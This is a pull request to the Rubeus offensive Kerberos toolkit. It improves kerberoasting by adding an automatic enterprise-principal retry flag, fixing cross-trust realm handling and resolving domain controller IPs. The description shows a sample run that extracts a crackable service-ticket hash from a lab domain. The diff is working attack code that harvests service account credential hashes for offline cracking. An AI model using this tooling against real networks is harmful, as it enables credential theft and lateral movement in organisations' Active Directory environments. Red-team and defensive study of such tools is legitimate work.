### PR TITLE
Some kerberoasting fixes

### DIFF
--- a/README.md
+++ b/README.md
@@ -162,6 +162,9 @@ Rubeus is licensed under the BSD 3-Clause license.
         Perform Kerberoasting with an existing TGT using an enterprise principal:
             Rubeus.exe kerberoast </spn:user@domain.com | /spns:user1@domain.com,user2@domain.com> /enterprise </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]
 
+        Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail:
+            Rubeus.exe kerberoast </ticket:BASE64 | /ticket:FILE.KIRBI> /autoenterprise [/nowrap]
+
         Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:
             Rubeus.exe kerberoast /usetgtdeleg [/nowrap]
 
@@ -1771,6 +1774,8 @@ If the `/pwdsetbefore:MM-dd-yyyy` argument is supplied, only accounts whose pass
 If the `/resultlimit:NUMBER` argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
 
 If the `/enterprise` flag is used, the spn is assumed to be an enterprise principal (i.e. *user@domain.com*). This flag only works when kerberoasting with a TGT.
+
+If the `/autoenterprise` flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will automatically retry using the enterprise principal. This is only useful when `/spn` or `/spns` is *not* supplied as Rubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account information.
 
 
 #### kerberoasting opsec

--- a/Rubeus/Commands/Kerberoast.cs
+++ b/Rubeus/Commands/Kerberoast.cs
@@ -31,6 +31,7 @@ namespace Rubeus.Commands
             int resultLimit = 0;
             bool simpleOutput = false;
             bool enterprise = false;
+            bool autoenterprise = false;
 
             if (arguments.ContainsKey("/spn"))
             {
@@ -162,6 +163,11 @@ namespace Rubeus.Commands
                 // use enterprise principals in the request, requires /spn and (/ticket or /tgtdeleg)
                 enterprise = true;
             }
+            if (arguments.ContainsKey("/autoenterprise"))
+            {
+                // use enterprise principals in the request if roasting with the SPN fails, requires /ticket or /tgtdeleg, does nothing is /spn or /spns is supplied
+                autoenterprise = true;
+            }
 
             if (arguments.ContainsKey("/creduser"))
             {
@@ -187,11 +193,11 @@ namespace Rubeus.Commands
 
                 System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);
 
-                Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, listUsers, enterprise);
+                Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, listUsers, enterprise, autoenterprise);
             }
             else
             {
-                Roast.Kerberoast(spn, spns, user, OU, domain, dc, null, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, listUsers, enterprise);
+                Roast.Kerberoast(spn, spns, user, OU, domain, dc, null, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, listUsers, enterprise, autoenterprise);
             }
         }
     }

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -99,6 +99,9 @@ namespace Rubeus.Domain
     Perform Kerberoasting with an existing TGT using an enterprise principal:
         Rubeus.exe kerberoast </spn:user@domain.com | /spns:user1@domain.com,user2@domain.com> /enterprise </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]
 
+    Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail:
+        Rubeus.exe kerberoast </ticket:BASE64 | /ticket:FILE.KIRBI> /autoenterprise [/nowrap]
+
     Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:
         Rubeus.exe kerberoast /usetgtdeleg [/nowrap]
 

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -12,7 +12,7 @@ namespace Rubeus.Domain
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v1.6.0 \r\n");
+            Console.WriteLine("  v1.6.1 \r\n");
         }
 
         public static void ShowUsage()

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -620,7 +620,7 @@ namespace Rubeus
                                     bool result = GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc, Interop.KERB_ETYPE.rc4_hmac);
                                     if (!result && autoenterprise)
                                     {
-                                        Console.WriteLine("\r\n[-] Retreiving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
+                                        Console.WriteLine("\r\n[-] Retrieving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
                                         servicePrincipalName = String.Format("{0}@{1}", samAccountName, domain);
                                         GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, true, dc, Interop.KERB_ETYPE.rc4_hmac);
                                     }
@@ -631,7 +631,7 @@ namespace Rubeus
                                     bool result = GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc);
                                     if (!result && autoenterprise)
                                     {
-                                        Console.WriteLine("\r\n[-] Retreiving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
+                                        Console.WriteLine("\r\n[-] Retrieving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
                                         servicePrincipalName = String.Format("{0}@{1}", samAccountName, domain);
                                         GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, true, dc);
                                     }

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -249,7 +249,7 @@ namespace Rubeus
             }
         }
 
-        public static void Kerberoast(string spn = "", List<string> spns = null, string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", bool simpleOutput = false, KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4", string pwdSetAfter = "", string pwdSetBefore = "", string ldapFilter = "", int resultLimit = 0, bool userStats = false, bool enterprise = false)
+        public static void Kerberoast(string spn = "", List<string> spns = null, string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", bool simpleOutput = false, KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4", string pwdSetAfter = "", string pwdSetBefore = "", string ldapFilter = "", int resultLimit = 0, bool userStats = false, bool enterprise = false, bool autoenterprise = false)
         {
             if (userStats)
             {
@@ -350,6 +350,15 @@ namespace Rubeus
                         Ticket ticket = TGT.tickets[0];
                         byte[] clientKey = TGT.enc_part.ticket_info[0].key.keyvalue;
                         Interop.KERB_ETYPE etype = (Interop.KERB_ETYPE)TGT.enc_part.ticket_info[0].key.keytype;
+
+                        // check if we've been given an IP for the DC, we'll need the name for the LDAP service ticket
+                        Match match = Regex.Match(dc, @"([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4}|(\d{1,3}\.){3}\d{1,3}");
+                        if (match.Success)
+                        {
+                            System.Net.IPAddress dcIP = System.Net.IPAddress.Parse(dc);
+                            System.Net.IPHostEntry dcInfo = System.Net.Dns.GetHostEntry(dcIP);
+                            dc = dcInfo.HostName;
+                        }
 
                         // request a service tickt for LDAP on the target DC
                         kirbiBytes = Ask.TGS(tgtUserName, ticketDomain, ticket, clientKey, etype, string.Format("ldap/{0}", dc), etype, null, false, dc, false, enterprise, false);
@@ -608,12 +617,24 @@ namespace Rubeus
                                    )
                                 {
                                     // if we're roasting RC4, but AES is supported AND we have a TGT, specify RC4
-                                    GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc, Interop.KERB_ETYPE.rc4_hmac);
+                                    bool result = GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc, Interop.KERB_ETYPE.rc4_hmac);
+                                    if (!result && autoenterprise)
+                                    {
+                                        Console.WriteLine("\r\n[-] Retreiving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
+                                        servicePrincipalName = String.Format("{0}@{1}", samAccountName, domain);
+                                        GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, true, dc, Interop.KERB_ETYPE.rc4_hmac);
+                                    }
                                 }
                                 else
                                 {
                                     // otherwise don't force RC4 - have all supported encryption types for opsec reasons
-                                    GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc);
+                                    bool result = GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, enterprise, dc);
+                                    if (!result && autoenterprise)
+                                    {
+                                        Console.WriteLine("\r\n[-] Retreiving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal");
+                                        servicePrincipalName = String.Format("{0}@{1}", samAccountName, domain);
+                                        GetTGSRepHash(TGT, servicePrincipalName, samAccountName, distinguishedName, outFile, simpleOutput, true, dc);
+                                    }
                                 }
                             }
                             else
@@ -793,7 +814,7 @@ namespace Rubeus
             }
         }
 
-        public static void GetTGSRepHash(KRB_CRED TGT, string spn, string userName = "user", string distinguishedName = "", string outFile = "", bool simpleOutput = false, bool enterprise = false, string domainController = "", Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial)
+        public static bool GetTGSRepHash(KRB_CRED TGT, string spn, string userName = "user", string distinguishedName = "", string outFile = "", bool simpleOutput = false, bool enterprise = false, string domainController = "", Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial)
         {
             // use a TGT blob to request a hash instead of the KerberosRequestorSecurityToken method
             string userDomain = "DOMAIN";
@@ -829,7 +850,10 @@ namespace Rubeus
                 KRB_CRED tgsKirbi = new KRB_CRED(tgsBytes);
                 DisplayTGShash(tgsKirbi, true, userName, userDomain, outFile, simpleOutput);
                 Console.WriteLine();
+                return true;
             }
+
+            return false;
         }
 
         public static void DisplayTGShash(KRB_CRED cred, bool kerberoastDisplay = false, string kerberoastUser = "USER", string kerberoastDomain = "DOMAIN", string outFile = "", bool simpleOutput = false)

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -36,6 +36,13 @@ namespace Rubeus
             if (!(roast) && (parts.Length > 1) && (parts[0] != "krbtgt"))
             {
                 targetDomain = parts[1].Substring(parts[1].IndexOf('.')+1);
+
+                // remove port when SPN is in format 'svc/domain.com:1234'
+                string[] targetParts = targetDomain.Split(':');
+                if (targetParts.Length > 1)
+                {
+                    targetDomain = targetParts[0];
+                }
             }
             else if (enterprise)
             {

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -37,6 +37,10 @@ namespace Rubeus
             {
                 targetDomain = parts[1].Substring(parts[1].IndexOf('.')+1);
             }
+            else if (enterprise)
+            {
+                targetDomain = sname.Split('@')[1];
+            }
             else
             {
                 targetDomain = domain;


### PR DESCRIPTION
Firstly, when kerberoasting across a trust using an enterprise principal the response would be WRONG_REALM, this was due to the referral TGT being for the foreign domain (to the user being kerberoasted), fixed this by adding logic to extract the domain from after the '@' within the SPN if `/enterprise` is used.

Secondly, when kerberoasting using the IP for `/dc:` and a TGT, the request for the LDAP service ticket (required for querying for users with SPNs) failed because the SPN used was *LDAP/[dc]*, to fix this if `dc` is an IP address, it now uses System.Net.Dns.GetHostEntry to resolve to the DC name and uses that to request the LDAP service ticket instead.

Lastly, added a `/autoenterprise` flag so that when kerberoasting with a TGT but without supplying a `/spn` or `/spns`, if the request fails for any reason, Rubeus will automatically retry using the enterprise principal (convenience), like this:

```
C:\temp\dev\Rubeus-kerberoasting\Rubeus\bin\Release>.\Rubeus.exe kerberoast /nowrap /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /ticket:doIFgzCCB ... BWS5MQUI= /autoenterprise

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.0


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets
[*] Target Domain          : internal.zeroday.lab
[+] Ticket successfully imported!
[*] Searching path 'LDAP://idc1.internal.zeroday.lab/DC=internal,DC=zeroday,DC=lab' for Kerberoastable users

[*] Total kerberoastable users : 3

...

[*] SamAccountName         : internal.unconstrain
[*] DistinguishedName      : CN=Internal Unconstrained,OU=CustomOU,DC=internal,DC=zeroday,DC=lab
[*] ServicePrincipalName   : foo/bar
[*] PwdLastSet             : 29/10/2020 15:20:46
[*] Supported ETypes       : RC4_HMAC_DEFAULT

[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM


[-] Retrieving service ticket with SPN failed and '/autoenterprise' passed, retrying with the enterprise principal
[*] Hash                   : $krb5tgs$23$*internal.unconstrain$internal.zeroday.lab$internal.unconstrain@internal.zeroday.lab*$AAC3ED05 ... 5337488
```